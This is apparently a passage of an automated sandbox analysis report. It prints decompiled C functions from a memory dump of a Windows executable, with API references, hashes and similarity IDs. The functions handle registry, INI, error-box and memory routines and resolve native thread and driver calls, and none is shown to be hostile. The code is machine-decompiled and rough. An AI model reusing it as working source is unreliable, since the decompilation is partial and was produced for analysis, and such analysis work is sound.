                                                                                                                0x00407a0c
                                                                                                                0x00407a11
                                                                                                                0x00407a13
                                                                                                                0x00407a14
                                                                                                                0x00407a17
                                                                                                                0x00407a18
                                                                                                                0x00407a1d
                                                                                                                0x00407a22
                                                                                                                0x00407a25
                                                                                                                0x00407a2a
                                                                                                                0x00407a35
                                                                                                                0x00407a3a
                                                                                                                0x00407a3b
                                                                                                                0x00407a40
                                                                                                                0x00407a52

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004079DB
                                                                                                                  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                0x00404683
                                                                                                                0x00404692
                                                                                                                0x00404699
                                                                                                                0x0040469b
                                                                                                                0x004046af
                                                                                                                0x004046ba
                                                                                                                0x004046bc
                                                                                                                0x004046c7
                                                                                                                0x004046cc
                                                                                                                0x004046cd
                                                                                                                0x004046ee
                                                                                                                0x004046f3
                                                                                                                0x004046fa
                                                                                                                0x004046fa
                                                                                                                0x004046ee
                                                                                                                0x00404705

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004046AF
                                                                                                                • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen_snwprintfmemset
                                                                                                                • String ID: %s\shell\%s
                                                                                                                • API String ID: 1458959524-3196117466
                                                                                                                • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                0x00409d5f
                                                                                                                0x00409d67
                                                                                                                0x00409d70
                                                                                                                0x00409ddb
                                                                                                                0x00409d72
                                                                                                                0x00409d74
                                                                                                                0x00409db2
                                                                                                                0x00409d84
                                                                                                                0x00409d84
                                                                                                                0x00409d8c
                                                                                                                0x00409d8d
                                                                                                                0x00409d98
                                                                                                                0x00409d9d
                                                                                                                0x00409d9e
                                                                                                                0x00409da6
                                                                                                                0x00409daf
                                                                                                                0x00409daf
                                                                                                                0x00409dc3
                                                                                                                0x00409dc3

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409D79
                                                                                                                • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                0x004047d2
                                                                                                                0x004047da
                                                                                                                0x004047e0
                                                                                                                0x004047e4
                                                                                                                0x004047ec
                                                                                                                0x004047ec
                                                                                                                0x004047f5
                                                                                                                0x00404800
                                                                                                                0x00404801
                                                                                                                0x00404802
                                                                                                                0x0040480d
                                                                                                                0x00404812
                                                                                                                0x00404813
                                                                                                                0x00404834

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                • _snwprintf.MSVCRT ref: 00404813
                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                0x004068ec
                                                                                                                0x004068f0
                                                                                                                0x004068f4
                                                                                                                0x004068ff
                                                                                                                0x00406902
                                                                                                                0x0040690a
                                                                                                                0x00406910
                                                                                                                0x00406911
                                                                                                                0x0040691b
                                                                                                                0x0040691e
                                                                                                                0x00406923
                                                                                                                0x0040692d
                                                                                                                0x0040692e
                                                                                                                0x00406933
                                                                                                                0x0040693d
                                                                                                                0x00406940
                                                                                                                0x00406949
                                                                                                                0x0040694a
                                                                                                                0x00406950
                                                                                                                0x00406956
                                                                                                                0x00406959
                                                                                                                0x0040695c
                                                                                                                0x00406964
                                                                                                                0x0040696d
                                                                                                                0x00406974
                                                                                                                0x0040697e
                                                                                                                0x00406989
                                                                                                                0x00406990
                                                                                                                0x00406998
                                                                                                                0x0040699b
                                                                                                                0x0040699f
                                                                                                                0x004069b8
                                                                                                                0x004069bc
                                                                                                                0x004069c4
                                                                                                                0x004069c7
                                                                                                                0x004069c7
                                                                                                                0x004069cb
                                                                                                                0x004069ce
                                                                                                                0x004069d4
                                                                                                                0x004069d4
                                                                                                                0x004069d9
                                                                                                                0x004069df
                                                                                                                0x004069e6
                                                                                                                0x004069ea
                                                                                                                0x004069ef
                                                                                                                0x004069f2
                                                                                                                0x004069f5
                                                                                                                0x00406a00
                                                                                                                0x00406a01
                                                                                                                0x00406a06
                                                                                                                0x00406a08
                                                                                                                0x00406a0b
                                                                                                                0x00406a10
                                                                                                                0x00406a16
                                                                                                                0x00406a25
                                                                                                                0x00406a25
                                                                                                                0x00406a18
                                                                                                                0x00406a1e
                                                                                                                0x00406a1e
                                                                                                                0x00406a27
                                                                                                                0x00406a2f
                                                                                                                0x00406a32
                                                                                                                0x00406a35
                                                                                                                0x00406a3b
                                                                                                                0x00406a41
                                                                                                                0x00406a47
                                                                                                                0x00406a4d
                                                                                                                0x00406a53
                                                                                                                0x00406a5d
                                                                                                                0x00406a6d

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                • memcpy.MSVCRT ref: 0040696D
                                                                                                                • memcpy.MSVCRT ref: 0040697E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 975042529-0
                                                                                                                • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                0x004097b1
                                                                                                                0x004097b9
                                                                                                                0x004097bb
                                                                                                                0x004097be
                                                                                                                0x004097c3
                                                                                                                0x004097ca
                                                                                                                0x004097de
                                                                                                                0x004097de
                                                                                                                0x004097e3
                                                                                                                0x004097e5
                                                                                                                0x004097e5
                                                                                                                0x004097ec
                                                                                                                0x004097f3
                                                                                                                0x004097f6
                                                                                                                0x004097fe
                                                                                                                0x00409802
                                                                                                                0x00409805
                                                                                                                0x0040980a
                                                                                                                0x0040980d
                                                                                                                0x00409810
                                                                                                                0x00409822
                                                                                                                0x00000000
                                                                                                                0x00409827
                                                                                                                0x0040982a
                                                                                                                0x004098da
                                                                                                                0x004098da
                                                                                                                0x004098dc
                                                                                                                0x004098e0
                                                                                                                0x004098e9
                                                                                                                0x004098ec
                                                                                                                0x004098f6
                                                                                                                0x004098f6
                                                                                                                0x004098e2
                                                                                                                0x00000000
                                                                                                                0x004098e2
                                                                                                                0x00409830
                                                                                                                0x00409833
                                                                                                                0x00409838
                                                                                                                0x0040983b
                                                                                                                0x0040983e
                                                                                                                0x0040985f
                                                                                                                0x0040985f
                                                                                                                0x00409861
                                                                                                                0x00409863
                                                                                                                0x0040989e
                                                                                                                0x004098b1
                                                                                                                0x004098b8
                                                                                                                0x004098c0
                                                                                                                0x004098c5
                                                                                                                0x004098d5
                                                                                                                0x00409865
                                                                                                                0x00409865
                                                                                                                0x00409865
                                                                                                                0x0040986c
                                                                                                                0x00409878
                                                                                                                0x0040987f
                                                                                                                0x0040988a
                                                                                                                0x0040988f
                                                                                                                0x0040988f
                                                                                                                0x0040986c
                                                                                                                0x00000000
                                                                                                                0x00409863
                                                                                                                0x00409840
                                                                                                                0x00409843
                                                                                                                0x00409846
                                                                                                                0x0040984b
                                                                                                                0x00409852
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409854
                                                                                                                0x0040985d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040985d
                                                                                                                0x00409894
                                                                                                                0x00000000
                                                                                                                0x00409894

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                • memset.MSVCRT ref: 00409805
                                                                                                                • memcpy.MSVCRT ref: 0040988A
                                                                                                                • memcpy.MSVCRT ref: 004098C0
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3641025914-0
                                                                                                                • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                0x004067ac
                                                                                                                0x004067af
                                                                                                                0x004067b5
                                                                                                                0x004067ba
                                                                                                                0x004067bf
                                                                                                                0x004067c1
                                                                                                                0x004067c6
                                                                                                                0x004067c7
                                                                                                                0x004067cc
                                                                                                                0x004067cd
                                                                                                                0x004067d2
                                                                                                                0x004067d4
                                                                                                                0x004067d9
                                                                                                                0x004067da
                                                                                                                0x004067df
                                                                                                                0x004067e0
                                                                                                                0x004067e5
                                                                                                                0x004067e7
                                                                                                                0x004067ec
                                                                                                                0x004067ed
                                                                                                                0x004067f2
                                                                                                                0x004067f3
                                                                                                                0x004067f8
                                                                                                                0x004067fa
                                                                                                                0x004067ff
                                                                                                                0x00406800
                                                                                                                0x00406805
                                                                                                                0x00406806
                                                                                                                0x00406808
                                                                                                                0x0040680f
                                                                                                                0x00406810
                                                                                                                0x00406812
                                                                                                                0x00406817
                                                                                                                0x0040681e
                                                                                                                0x00406828
                                                                                                                0x0040682b
                                                                                                                0x0040682c
                                                                                                                0x0040681e
                                                                                                                0x00406835
                                                                                                                0x00406839
                                                                                                                0x00406841

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
